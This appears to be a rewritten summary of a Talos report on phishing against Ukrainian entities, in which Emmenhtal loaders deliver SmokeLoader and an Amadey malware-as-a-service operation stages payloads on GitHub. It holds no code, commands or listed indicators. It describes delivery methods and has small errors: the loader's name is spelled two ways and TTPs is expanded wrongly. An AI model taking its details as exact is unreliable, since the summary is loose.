MaaS Operation Using Emmenhtal and Amadey Linked to Threats Against Ukrainian Entities
In early February 2025, Talos observed a cluster of invoice payment and billing-themed phishing emails targeting Ukrainian entities. These emails included compressed archive attachments containing at least one JavaScript file that used several layers of obfuscation to disguise a PowerShell downloader. The execution of the JavaScript and PowerShell script resulted in the download and execution of SmokeLoader on the victim system.
The Connection to Emmenhtal
Talos assessed the JavaScript downloaders to be the Emmenthal loader, based on notable similarities between the obfuscation methods observed in the collected samples and those described by Orange Cyberdefense. During analysis of the Emmenhtal loaders collected from this phishing campaign, Talos identified additional samples on VirusTotal that were highly similar in structure but did not appear to be part of the original activity cluster.
A Larger MaaS Operation
However, further review of the associated GitHub accounts and the files hosted within related repositories revealed a larger MaaS operation that uses public GitHub repositories as open directories for staging custom payloads. The operation leverages Amadey, which in turn downloads a variety of custom payloads from certain public GitHub repositories.
Understanding MaaS Operations
MaaS is a business model where the operators of the service sell access to malware or pre-existing infrastructure. In this operation, Talos identified that the operators utilized Amadey to download various malware families from fake GitHub repositories onto infected hosts. The distribution of several disparate malware families from a single infrastructure suggests that the threat actors behind the instances of Amadey are distributing payloads for other individuals or groups.
The Emmenhtal Loader
The Emmenhtal loader is a multistage downloader that has been reported by Kroll and Orange Cyberdefense. It was given the name “Emmenhtal” by Orange Cyberdefense in August 2024, though it is sometimes referred to as “PEAKLIGHT,” which is how Mandiant refers to the final stage PowerShell downloader.
Amadey and Its Role
Amadey (or Amadey bot) originally appeared in late 2018 on Russian-speaking hacking forums with a $500 price tag. It was initially used by various threat actors to establish botnets. Amadey has also been observed dropping other malware including Redline, Lumma, StealC and SmokeLoader.
GitHub Repositories as Staging Grounds
Talos discovered that three GitHub accounts were being used as open directories for hosting tools, secondary payloads and Amadey plugins. These repositories may bypass web filtering, making it difficult to detect malicious activity.
Similarities Between the SmokeLoader Campaign and the Amadey MaaS Activity
Research revealed similarities in TTPs (Threat Tactics) and indicators between the SmokeLoader campaign and the Amadey MaaS activity. Three of the JavaScript files hosted by the “Milidmdds” GitHub account are nearly identical to the Emmenthal scripts used in the SmokeLoader campaign.
File Formats and Payloads
Talos discovered that a legitimate copy of PuTTY was delivered by the Emmenhtal loaders found in public GitHub repositories. The presence of such files demonstrates the adaptability of the MaaS operation to deliver whatever tooling is required by its customers.
IOCs and Detection Methods
To detect and block this threat, Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited. Additionally, Cisco Secure Email can block malicious emails sent by threat actors as part of their campaign, while Cisco Secure Firewall appliances such as Threat Defense Virtual, Adaptive Security Appliance, and Meraki MX can detect malicious activity associated with this threat.
Conclusion
The recent MaaS operation using Emmenhtal and Amadey linked to threats against Ukrainian entities highlights the importance of staying informed about emerging threats. By understanding how these operations work and implementing appropriate security measures, organizations can protect themselves against such threats.